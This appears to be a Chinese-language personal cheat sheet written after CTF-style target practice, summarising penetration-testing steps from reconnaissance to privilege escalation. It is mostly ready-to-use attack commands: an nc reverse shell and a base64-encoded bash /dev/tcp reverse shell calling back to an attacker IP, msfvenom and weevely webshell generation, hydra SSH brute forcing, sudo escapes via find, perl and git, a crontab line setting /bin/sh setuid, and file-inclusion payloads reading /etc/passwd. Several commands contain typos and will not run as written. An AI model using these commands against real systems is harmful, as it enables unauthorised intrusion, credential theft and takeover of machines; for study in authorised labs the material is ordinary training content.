打靶后个人的一些总结
1. 信息搜集
做渗透测试,首先最基础的也是最重要的是信息搜集,良好的信息情报是成功的第一步
1.1. 端口扫描工具
nmap:
常用扫描类型:Nmap常用命令总结_nmap -ss-CSDN博客
常用的端口:
80,默认访问
21,可能有文件可以通过ftp匿名下载
22,ssh
8080,
注意一些不常见的端口,存在漏洞或泄露信息的可能性较大
1.2. 整站扫描工具
nikto:nikto -h ip
owasp-zap:图形化扫描工具
dirb
gobuster:端口内容扫描工具
gobuster dir -u http://ip:端口 -w /usr/share/wordlists/dirb/bing.txt
#后面的是字典
curl:搜寻网站所支持的内容
whatweb:网站类型扫描工具
1.3. 特殊类型网站扫描工具
wpsacn:扫描wordpress网站
joomscan:扫描joomla网站
2. shell获取
2.1. nc反弹shell
通过将靶机的命令行转发到攻击机以获取权限
靶机:nc [攻击机ip] [端口] -e /bin/bash
攻击机:nc -lvp [端口]
2.2. msf
msfconsle
进入msf操作框架,可实现搜索漏洞并攻击,设置监听等功能
常用监听命令:
use exploit/multi/hander
set payload php/meterpreter/reverse_tcp
set lhost 攻击机ip
set lport 4444
run
搜索漏洞:
search 漏洞名
use 漏洞地址
msfvenom
生成木马工具,搭配使用
msfvenom -p php/meterpreter/reverser_tcp lhost=攻击机ip lport=4444 -f raw > /root/msfshell.php
2.3. weevely
生成、连接木马工具
生成:weevely generate 123456 haha.php
连接:weevely http://木马地址 123456
3. 密码破解
3.1. burp暴力破解
没什么好说的,准备好充足的字典即可
3.2. cewl
搜集可能存在的密码
cewl 域名 -w passwd.txt
3.3. wpscan
破解wordpress站的密码
wpscan –url 域名 -U username.txt -P passwd.txt
3.4. hydra
破解ssh密码
hydra -L username.txt -P passwd.txt [ip地址] ssh -s 7744
3.5. john
john mima.txt
4. 权限提升
4.1. 搜索漏洞提权
sudo -l
find / -perm -u=s -type f 2>/dev/null
查看有什么能以root权限执行
或者查看系统名及版本
uname -a
接着
searchsploit 名称
搜索相关漏洞
4.1.1. 常见漏洞
find
创建一个名为hah的文件
touch hah
查找并执行命令
*find / -name hah -exec “/bin/sh” *
perl
sudo perl -e “exec’bin/sh’”
teehee(ssh)
sudo teehee /etc/crontab #teehee是一个可以写文件的东西
* * * * * root chmod 4777 /bin/sh #每分钟执行一次,定时提权
4.2. 命令行提权
echo $PATH #查看当前的命令行
BASH_CMDS[a]=/bin/sh #按下键盘a就可以调用/bin/sh命令行
/bin/bash(kali中常用的命令行)
export PATH=PATH:/bin
export PATH=PATH:/sbin:/bin
#把高级权限的命令行也加到自己的path(环境变量)里
4.3. git提权
git提权,下面两条都可以用
sudo git -p –help
sudo git help config #任选一条
git命令在查看帮助文档的时候可以敲命令,命令格式为[!+命令]
每一次输命令都要!+命令,就是借用git的root权限执行命令
5. 其他
5.1. ssh漏洞
免登录执行
ssh 用户名@localhost 命令
ssh ‘‘@xxx.xxx.xxx.xxx
5.2. 修改drupal管理员密码
drush user-password admin –password=”123456”
5.3. 下载命令
wget
5.4. nc被屏蔽掉的情况
执行如下命令后会出现一串编码
echo ‘bash -i >& /dev/tcp/攻击机ip/1234 0>&1’ | base64
在漏洞处
echo 编码 | base64 -d|bash
5.5. 域名屏蔽
有的网站无法通过ip地址直接访问
在/root/hosts中添加
ip地址 域名
5.6. 文件包含漏洞利用
查看密码
file=../../../../../../etc/passwd
查看源码
file=php://filter/convert.base64-encode/resource=index.php
ssh登录日志
file=/var/log/auth.log